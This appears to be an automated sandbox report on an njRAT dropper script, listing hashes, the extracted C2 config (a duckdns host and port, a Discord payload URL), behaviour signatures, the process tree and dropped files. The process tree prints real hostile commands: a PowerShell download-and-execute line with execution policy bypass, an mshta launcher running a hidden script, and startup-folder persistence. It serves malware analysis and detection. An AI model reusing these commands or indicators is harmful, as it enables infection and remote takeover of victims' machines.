Analysis
-
max time kernel
154s -
max time network
144s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
01-12-2021 15:03
General
-
Target
34ce23e0cac1eb85e253f52b87c53436.js
-
Size
256B
-
MD5
34ce23e0cac1eb85e253f52b87c53436
-
SHA1
fbc026960fc1009eae89f7506276a5e153ec58ec
-
SHA256
ba2680549e33524c3b96c4b2be01c47297e977fe7532034936d8baa4f6dc3104
-
SHA512
488b7d7cc0a3a723273f4bac17f4b45daa9c894d03af15b6c14e84d9f9b4ee3fa7d263b03fb3c12c78361a4a9d92b77a6e7a25e323b9494e937ba1ca6be92c9d
Malware Config
Extracted
https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt
Extracted
njrat
0.7NC
NYAN CAT
yuni2022.duckdns.org:2000
4ab2234479534
-
reg_key
4ab2234479534
-
splitter
@!#&^%$
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 1 IoCs
-
Drops startup file 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 35 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\34ce23e0cac1eb85e253f52b87c53436.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0d21ece7171054478f36b3470d9d6a34
SHA14802567d39d446740de2eb030f7e70e385e90063
SHA256794212e45e56bcc389fd1db186bf2c8ba8530a0254ff7761643b803972355165
SHA512d40e11708b2fbf85f074420ee9928feb232f9f8a914a85d0e74eccb2a94e7ba34f40c3c856a9ca648fb23ecf99fbcb717030405d21974898953cf1c387b49250
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBSMD5
558a8b7b3fdef4ca79110f8cfd126694
SHA1d6e96ca27f701b3f4c24885dacd14c762a9d36b0
SHA25638c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
SHA51237d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283
-
C:\Users\Admin\AppData\Roaming\SystemLogin.batMD5
7f85382953fde20b101039d48673dbd2
SHA15ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
SHA256fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
SHA5126e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46
-
C:\Users\Public\myScript.ps1MD5
b7ce758a456d759c9c8d9d165de473bc
SHA1eb07b9f9a21b12945cd461d970b925698183b8f5
SHA2560d44b8e8222a09eecef416a78409757ac190eae8bd7c0ceb2880791eedeec295
SHA5128c239aa579b8e3875a271a730755c8ee2f83ac72b248270090a8bc025850ac2bd81100dac6118935a10ab686f7e295d599ee99a94779446db5b9cc30110cea04
-
memory/1468-157-0x000001C80B698000-0x000001C80B6A0000-memory.dmpFilesize
32KB
-
memory/1468-156-0x0000000000000000-mapping.dmp
-
memory/2572-176-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-162-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-189-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-186-0x000001B7C5990000-0x000001B7C5993000-memory.dmpFilesize
12KB
-
memory/2572-185-0x000001B7C5980000-0x000001B7C5985000-memory.dmpFilesize
20KB
-
memory/2572-180-0x000001B7AD170000-0x000001B7AD172000-memory.dmpFilesize
8KB
-
memory/2572-175-0x000001B7ACF96000-0x000001B7ACF98000-memory.dmpFilesize
8KB
-
memory/2572-174-0x000001B7ACF93000-0x000001B7ACF95000-memory.dmpFilesize
8KB
-
memory/2572-173-0x000001B7ACF90000-0x000001B7ACF92000-memory.dmpFilesize
8KB
-
memory/2572-170-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-168-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-167-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-164-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-163-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-158-0x0000000000000000-mapping.dmp
-
memory/2572-160-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2572-161-0x000001B7ACE00000-0x000001B7ACE02000-memory.dmpFilesize
8KB
-
memory/2776-155-0x0000000000000000-mapping.dmp
-
memory/3032-187-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/3032-197-0x0000000005910000-0x0000000005911000-memory.dmpFilesize
4KB
-
memory/3032-196-0x0000000005690000-0x0000000005691000-memory.dmpFilesize
4KB
-
memory/3032-195-0x00000000055F0000-0x0000000005AEE000-memory.dmpFilesize
5.0MB
-
memory/3032-194-0x00000000056D0000-0x00000000056D1000-memory.dmpFilesize
4KB
-
memory/3032-193-0x0000000005AF0000-0x0000000005AF1000-memory.dmpFilesize
4KB
-
memory/3032-192-0x00000000054A0000-0x00000000054A1000-memory.dmpFilesize
4KB
-
memory/3032-188-0x000000000040676E-mapping.dmp
-
memory/3688-152-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-124-0x00000271481C0000-0x00000271481C1000-memory.dmpFilesize
4KB
-
memory/3688-134-0x00000271301A0000-0x00000271301A2000-memory.dmpFilesize
8KB
-
memory/3688-118-0x0000000000000000-mapping.dmp
-
memory/3688-133-0x0000027148376000-0x0000027148378000-memory.dmpFilesize
8KB
-
memory/3688-129-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-128-0x0000027148500000-0x0000027148501000-memory.dmpFilesize
4KB
-
memory/3688-122-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-119-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-127-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-121-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-125-0x0000027148373000-0x0000027148375000-memory.dmpFilesize
8KB
-
memory/3688-126-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-120-0x000002712E190000-0x000002712E192000-memory.dmpFilesize
8KB
-
memory/3688-123-0x0000027148370000-0x0000027148372000-memory.dmpFilesize
8KB
-
memory/4064-151-0x0000000000000000-mapping.dmp